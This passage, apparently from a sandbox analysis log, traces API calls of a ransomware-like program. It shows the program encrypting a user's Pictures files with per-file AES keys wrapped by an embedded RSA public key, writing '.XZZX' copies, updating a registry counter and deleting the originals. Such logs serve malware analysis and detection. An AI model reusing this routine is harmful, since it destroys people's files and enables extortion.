lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2e, lpOverlapped=0x0) returned 1 [0126.751] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18923 [0126.751] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.752] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18928 [0126.752] SetErrorMode (uMode=0x1) returned 0x1 [0126.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0126.752] OutputDebugStringW (lpOutputString="end") [0126.752] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.752] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0126.752] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1e3d0) returned 1 [0126.752] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e3d0, dwCertEncodingType=0x1, pInfo=0x3d0dbc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0dbf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0dc00*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddc98) returned 1 [0126.752] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.753] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0126.753] CryptEncrypt (in: hKey=0x3cddc98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0126.753] CryptEncrypt (in: hKey=0x3cddc98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e458*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e458*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0126.753] WriteFile (in: hFile=0x61c, lpBuffer=0x3d1e458*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e458*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0126.753] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0126.753] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.753] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0126.753] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0126.753] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x628) returned 0x0 [0126.754] RegQueryValueExW (in: hKey=0x628, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x9c, lpcbData=0x420dfdc*=0x4) returned 0x0 [0126.754] RegCloseKey (hKey=0x628) returned 0x0 [0126.754] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x628) returned 0x0 [0126.754] RegSetValueExW (in: hKey=0x628, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x9d, cbData=0x4 | out: lpData=0x420dfec*=0x9d) returned 0x0 [0126.754] RegCloseKey (hKey=0x628) returned 0x0 [0126.754] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.754] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.754] CloseHandle (hObject=0x61c) returned 1 [0126.756] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0126.756] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0126.756] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VUaHmntzHPrBw9rs6O1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vuahmntzhprbw9rs6o1.jpg")) returned 1 [0126.758] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VUaHmntzHPrBw9rs6O1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vuahmntzhprbw9rs6o1.jpg")) returned 0 Thread: id = 421 os_tid = 0x9a4 [0126.701] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.701] lstrcpyW (in: lpString1=0x434f460, lpString2="wbMFjBguMLJG3mRfnnUn.bmp" | out: lpString1="wbMFjBguMLJG3mRfnnUn.bmp") returned="wbMFjBguMLJG3mRfnnUn.bmp" [0126.701] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.701] SetErrorMode (uMode=0x1) returned 0x1 [0126.701] lstrcpyW (in: lpString1=0x434f860, lpString2="wbMFjBguMLJG3mRfnnUn.bmp" | out: lpString1="wbMFjBguMLJG3mRfnnUn.bmp") returned="wbMFjBguMLJG3mRfnnUn.bmp" [0126.701] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x51213bc8, Data2=0xcbf, Data3=0x4773, Data4=([0]=0x97, [1]=0xe0, [2]=0xe6, [3]=0x5d, [4]=0xe3, [5]=0xfb, [6]=0x81, [7]=0x5f))) returned 0x0 [0126.701] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wbMFjBguMLJG3mRfnnUn.bmp") returned 67 [0126.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.701] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1698FA38038EB2CD51213BC807C39715.XZZX") returned 80 [0126.701] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="XZZX") returned 0x0 [0126.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wbMFjBguMLJG3mRfnnUn.bmp", dwFileAttributes=0x20) returned 1 [0126.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wbMFjBguMLJG3mRfnnUn.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wbmfjbgumljg3mrfnnun.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0126.702] ReadFile (in: hFile=0x61c, lpBuffer=0x3ce77e0, nNumberOfBytesToRead=0x65c0, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesRead=0x434e418*=0x65c0, lpOverlapped=0x0) returned 1 [0126.703] CloseHandle (hObject=0x61c) returned 1 [0126.703] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0126.703] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0126.703] SetErrorMode (uMode=0x1) returned 0x1 [0126.703] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.703] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e348) returned 1 [0126.706] CryptGenKey (in: hProv=0x3d1e348, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddd58) returned 1 [0126.825] CryptExportKey (in: hKey=0x3cddd58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0126.825] CryptExportKey (in: hKey=0x3cddd58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0126.825] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.825] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0126.825] CryptDestroyKey (hKey=0x3cddd58) returned 1 [0126.826] CryptReleaseContext (hProv=0x3d1e348, dwFlags=0x0) returned 0 [0126.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1698FA38038EB2CD51213BC807C39715.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1698fa38038eb2cd51213bc807c39715.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0126.826] WriteFile (in: hFile=0x610, lpBuffer=0x3ce77e0*, nNumberOfBytesToWrite=0x65c0, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce77e0*, lpNumberOfBytesWritten=0x434e438*=0x65c0, lpOverlapped=0x0) returned 1 [0126.827] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65c0 [0126.827] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0126.827] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65c5 [0126.827] WriteFile (in: hFile=0x610, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x30, lpOverlapped=0x0) returned 1 [0126.827] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65f5 [0126.827] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0126.827] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x65fa [0126.827] SetErrorMode (uMode=0x1) returned 0x1 [0126.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0126.827] OutputDebugStringW (lpOutputString="end") [0126.828] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.828] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0126.828] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1e4e0) returned 1 [0126.828] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e4e0, dwCertEncodingType=0x1, pInfo=0x3d0d3a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d3d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d3e0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cddd58) returned 1 [0126.828] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.829] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0126.829] CryptEncrypt (in: hKey=0x3cddd58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0126.829] CryptEncrypt (in: hKey=0x3cddd58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e568*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e568*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0126.829] WriteFile (in: hFile=0x610, lpBuffer=0x3d1e568*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e568*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0126.829] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0126.829] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0126.829] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0126.830] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0126.830] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x618) returned 0x0 [0126.830] RegQueryValueExW (in: hKey=0x618, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x9d, lpcbData=0x434dfdc*=0x4) returned 0x0 [0126.830] RegCloseKey (hKey=0x618) returned 0x0 [0126.830] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x618) returned 0x0 [0126.830] RegSetValueExW (in: hKey=0x618, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x9e, cbData=0x4 | out: lpData=0x434dfec*=0x9e) returned 0x0 [0126.830] RegCloseKey (hKey=0x618) returned 0x0 [0126.830] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.830] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.831] CloseHandle (hObject=0x610) returned 1 [0126.832] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0126.832] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0126.832] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wbMFjBguMLJG3mRfnnUn.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wbmfjbgumljg3mrfnnun.bmp")) returned 1 [0126.833] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wbMFjBguMLJG3mRfnnUn.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wbmfjbgumljg3mrfnnun.bmp")) returned 0 Thread: id = 422 os_tid = 0x9a8 [0126.835] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.835] lstrcpyW (in: lpString1=0x420f460, lpString2="XL uwZp2bbBe4jnmB.png" | out: lpString1="XL uwZp2bbBe4jnmB.png") returned="XL uwZp2bbBe4jnmB.png" [0126.835] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.835] SetErrorMode (uMode=0x1) returned 0x1 [0126.835] lstrcpyW (in: lpString1=0x420f860, lpString2="XL uwZp2bbBe4jnmB.png" | out: lpString1="XL uwZp2bbBe4jnmB.png") returned="XL uwZp2bbBe4jnmB.png" [0126.835] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6f9968d2, Data2=0xb558, Data3=0x43f8, Data4=([0]=0x9d, [1]=0x78, [2]=0xc2, [3]=0x8, [4]=0x7a, [5]=0x38, [6]=0x8, [7]=0x5a))) returned 0x0 [0126.835] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XL uwZp2bbBe4jnmB.png") returned 64 [0126.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.835] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D3D882303025B5406F9968D234469988.XZZX") returned 80 [0126.835] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="XZZX") returned 0x0 [0126.835] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XL uwZp2bbBe4jnmB.png", dwFileAttributes=0x20) returned 1 [0126.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XL uwZp2bbBe4jnmB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xl uwzp2bbbe4jnmb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0126.836] ReadFile (in: hFile=0x624, lpBuffer=0x4360048, nNumberOfBytesToRead=0xcac6, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesRead=0x420e418*=0xcac6, lpOverlapped=0x0) returned 1 [0126.838] CloseHandle (hObject=0x624) returned 1 [0126.838] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0126.838] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0126.839] SetErrorMode (uMode=0x1) returned 0x1 [0126.839] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.839] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e5f0) returned 1 [0126.841] CryptGenKey (in: hProv=0x3d1e5f0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde058) returned 1 [0127.026] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.026] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.026] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.027] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0127.027] CryptDestroyKey (hKey=0x3cde058) returned 1 [0127.027] CryptReleaseContext (hProv=0x3d1e5f0, dwFlags=0x0) returned 1 [0127.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D3D882303025B5406F9968D234469988.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\d3d882303025b5406f9968d234469988.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0127.027] WriteFile (in: hFile=0x61c, lpBuffer=0x4360048*, nNumberOfBytesToWrite=0xcac6, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesWritten=0x420e438*=0xcac6, lpOverlapped=0x0) returned 1 [0127.028] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcac6 [0127.028] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: 